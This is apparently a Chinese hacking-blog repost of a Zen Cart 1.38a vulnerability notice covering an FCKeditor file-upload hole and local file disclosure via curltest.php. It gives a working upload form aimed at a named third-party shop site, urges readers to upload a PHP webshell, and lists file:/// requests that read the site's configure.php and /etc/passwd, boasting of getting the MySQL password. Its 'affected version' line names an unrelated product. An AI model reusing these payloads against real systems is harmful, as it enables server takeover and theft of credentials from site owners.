[bug]zen cart 1.38a 多处漏洞0day 及本地文件泄露

2010年9月9日星期四 | | |

发布日期:2010-08.30
发布作者:admind
影响版本:Atomic Photo Album 1.0.2
官方地址:www.zen-cart.cn/
漏洞类型:上传漏洞、本地包含
漏洞描述:zen cart 1.38a以下版本存在Fckeditor上传漏洞与curltest.php页存本在文件包含漏洞。

漏洞测试1:

 <form id="frmUpload" enctype="multipart/form-data" action="http://aus-snowboots.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
 

大家试下威力。 直接上传PHP WEBSHELL 到IMAGES

 

漏洞测试2:Zen Cart 本地文件泄露

得到网页所在路径
/extras/ipn_test_return.php
得到网站配置信息
/extras/curltest.php?url=file:///网站地址/includes/configure.php
读取linux服务器passwd
/extras/curltest.php?url=file:///etc/passwd

拿到MYSQL密码,但是数据库只允许本地链接。。。 

 

0 评论:


所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]